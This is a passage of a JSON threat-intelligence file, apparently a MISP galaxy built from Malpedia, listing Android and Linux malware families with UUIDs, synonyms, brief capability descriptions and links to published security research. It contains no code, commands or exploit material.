{ "authors": [ "Davide Arcuri", "Alexandre Dulaunoy", "Steffen Enders", "Andrea Garavaglia", "Andras Iklody", "Daniel Plohmann", "Christophe Vandeplas" ], "category": "tool", "description": "Malware galaxy cluster based on Malpedia.", "name": "Malpedia", "source": "Malpedia", "type": "malpedia", "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", "values": [ { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" ], "synonyms": [], "type": [] }, "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", "value": "AdultSwine" }, { "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give control of the Android system remotely and retrieve information from it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", "https://github.com/DesignativeDave/androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], "type": [] }, "uuid": "80447111-8085-40a4-a052-420926091ac6", "value": "AndroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/" ], "synonyms": [], "type": [] }, "uuid": 
"06ffb614-33ca-4b04-bf3b-623e68754184", "value": "AnubisSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub", "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" ], "synonyms": [], "type": [] }, "uuid": "dffa06ec-e94f-4fd7-8578-2a98aace5473", "value": "Asacub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", "http://blog.koodous.com/2017/05/bankbot-on-google-play.html" ], "synonyms": [], "type": [] }, "uuid": "85975621-5126-40cb-8083-55cbfa75121b", "value": "BankBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian", "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html" ], "synonyms": [], "type": [] }, "uuid": "1faaa5c5-ab4e-4101-b2d9-0e12207d70fc", "value": "BianLian" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper", 
"https://securelist.com/busygasper-the-unfriendly-spy/87627/" ], "synonyms": [], "type": [] }, "uuid": "4bf68bf8-08e5-46f3-ade5-0bd4f124b168", "value": "BusyGasper" }, { "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", "https://www.youtube.com/watch?v=1LOy0ZyjEOk" ], "synonyms": [], "type": [] }, "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", "value": "Catelites" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", "http://blog.checkpoint.com/2017/01/24/charger-malware/", "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" ], "synonyms": [], "type": [] }, "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", "value": "Charger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://media.ccc.de/v/33c3-7901-pegasus_internals", 
"https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" ], "synonyms": [ "JigglyPuff", "Pegasus" ], "type": [] }, "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", "value": "Chrysaor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", "https://twitter.com/LukasStefanko/status/1042297855602503681" ], "synonyms": [], "type": [] }, "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", "value": "Clientor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" ], "synonyms": [ "SpyBanker" ], "type": [] }, "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", "value": "Connic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" ], "synonyms": [], "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" ], "synonyms": [], "type": [] }, "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", "value": "DoubleLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", "value": "DualToy (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", 
"https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" ], "synonyms": [], "type": [] }, "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", "value": "Dvmap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" ], "synonyms": [], "type": [] }, "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", "value": "ExoBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram", "https://blog.talosintelligence.com/2018/11/persian-stalker.html" ], "synonyms": [ "FakeTGram" ], "type": [] }, "uuid": "6c0fc7e4-4629-494f-b471-f7a8cc47c0e0", "value": "FakeGram" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", "https://twitter.com/LukasStefanko/status/886849558143279104" ], "synonyms": [ "gugi" ], "type": [] }, "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", "value": "FlexNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" ], "synonyms": [], "type": [] }, "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", "value": "GhostCtrl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", "https://www.ci-project.org/blog/2017/3/4/arid-viper", 
"https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", "https://www.clearskysec.com/glancelove/" ], "synonyms": [], "type": [] }, "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, { "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed", "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", "https://blog.talosintelligence.com/2018/10/gplayerbanker.html" ], "synonyms": [], "type": [] }, "uuid": "13dc1ec7-aba7-4553-b990-8323405a1d32", "value": "GPlayed" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" ], "synonyms": [], "type": [] }, "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", "value": "HeroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" ], "synonyms": [], "type": [] }, "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", "value": "IRRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", "https://blog.lookout.com/mobile-threat-jaderat" ], "synonyms": [], "type": [] }, "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", "value": "JadeRAT" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], "synonyms": [], "type": [] }, "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", "value": "KevDroid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", "https://twitter.com/LukasStefanko/status/928262059875213312" ], "synonyms": [], "type": [] }, "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", "value": "Koler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" ], "synonyms": [], "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", "value": "Lazarus (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" ], "synonyms": [], "type": [] }, "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", "value": "Lazarus ELF Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" ], "synonyms": [], "type": [] }, "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", "value": "Loki" }, { "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. 
Note, the network traffic is obfuscated the same way as in Android Bankbot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" ], "synonyms": [], "type": [] }, "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", "value": "LokiBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", "https://www.clientsidedetection.com/marcher.html", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" ], "synonyms": [ "ExoBot" ], "type": [] }, "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", "value": "Marcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html", "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/" ], "synonyms": [], "type": [] }, "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", "value": "MazarBot" }, { "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" ], "synonyms": [], "type": [] }, "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", "value": "MysteryBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", 
"https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" ], "synonyms": [], "type": [] }, "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", "value": "OmniRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.podec", "https://securelist.com/jack-of-all-trades/83470/" ], "synonyms": [], "type": [] }, "uuid": "82f9c4c1-2619-4236-a701-776c6c781f45", "value": "Podec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" ], "synonyms": [ "Popr-d30" ], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" ], "synonyms": [], "type": [] }, "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", "value": "Fake Pornhub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" ], "synonyms": [], "type": [] }, "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", "value": "Raxir" }, { "description": "RedAlert 2 is a new Android malware used by an attacker to gain access to login credentials of various e-banking apps. 
The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim from being notified.\r\nAs a distribution vector, RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores", "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html" ], "synonyms": [], "type": [] }, "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", "value": "RedAlert2" }, { "description": "The Android app used for Retefe is an SMS stealer, used to forward mTAN codes to the threat actor. Furthermore, a bank logo is added to the specific Android app to trick users into thinking this is a legitimate app. 
Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html", "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/" ], "synonyms": [], "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", "value": "Retefe (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" ], "synonyms": [], "type": [] }, "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", "value": "Roaming Mantis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" ], "synonyms": [], "type": [] }, "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", "value": "Rootnik" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", 
"https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" ], "synonyms": [], "type": [] }, "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", "value": "Skygofree" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html", "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html" ], "synonyms": [ "SlemBunk" ], "type": [] }, "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", "value": "Slempo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" ], "synonyms": [], "type": [] }, "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", "value": "Slocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" ], "synonyms": [], "type": [] }, "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", "value": "SMSspy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", "https://news.drweb.com/show/?i=11104&lng=en", "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" ], "synonyms": [], "type": [] }, "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", "value": "SpyBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" ], "synonyms": [], "type": [] }, "uuid": "31592c69-d540-4617-8253-71ae0c45526c", "value": "SpyNote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], "synonyms": [], "type": [] 
}, "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", "value": "StealthAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", "https://www.lookout.com/info/stealth-mango-report-ty" ], "synonyms": [], "type": [] }, "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", "value": "Stealth Mango" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" ], "synonyms": [], "type": [] }, "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", "value": "Svpeng" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" ], "synonyms": [], "type": [] }, "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", "value": "Switcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" ], "synonyms": [], "type": [] }, "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", "value": "TeleRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" ], "synonyms": [], "type": [] }, "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", "value": "TemptingCedar Spyware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", "http://blog.group-ib.com/cron" ], "synonyms": [ "Catelites Android Bot", "MarsElite Android Bot" ], "type": [] }, "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", "value": "TinyZ" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", 
"https://blog.lookout.com/titan-mobile-threat", "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" ], "synonyms": [], "type": [] }, "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", "value": "Titan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html" ], "synonyms": [], "type": [] }, "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", "value": "Triada" }, { "description": "Bitdefender described Triout as an Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. 
Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recording videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", "https://labs.bitdefender.com/wp-content/uploads/downloads/triout-the-malware-framework-for-android-that-packs-potent-spyware-capabilities/" ], "synonyms": [], "type": [] }, "uuid": "bd9ce51c-53f9-411b-b46a-aba036c433b1", "value": "Triout" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", "https://twitter.com/illegalFawn/status/826775250583035904" ], "synonyms": [], "type": [] }, "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", "value": "Unidentified APK 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" ], "synonyms": [], "type": [] }, "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", "value": "Unidentified APK 002" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" ], "synonyms": [], "type": [] }, "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", "value": "Viper RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/", "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/" ], "synonyms": [], "type": [] }, "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", "value": "WireX" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/", "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" ], "synonyms": [], "type": [] }, "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", "value": "Xbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", "https://blog.lookout.com/xrat-mobile-threat" ], "synonyms": [], "type": [] }, "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", "value": "XRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", "https://securelist.com/whos-who-in-the-zoo/85394" ], "synonyms": [], "type": [] }, "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", "value": "ZooPark" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", "https://securelist.com/ztorg-from-rooting-to-sms/78775/" ], "synonyms": [ "Qysly" ], "type": [] }, "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", "value": "Ztorg" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", "https://news.drweb.com/show/?c=5&i=10193&lng=en" ], "synonyms": [], "type": [] }, "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", "value": "Irc16" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", 
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/" ], "synonyms": [ "Gafgyt", "gayfgt", "lizkebab", "qbot", "torlus" ], "type": [] }, "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", "value": "Bashlite" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter", "https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/" ], "synonyms": [], "type": [] }, "uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209", "value": "BCMPUPnP_Hunter" }, { "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html", "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", "https://blogs.cisco.com/security/linuxcdorked-faqs" ], "synonyms": [ "CDorked.A" ], "type": [] }, "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", "value": "CDorked" }, { "description": "", "meta": { "refs": [ 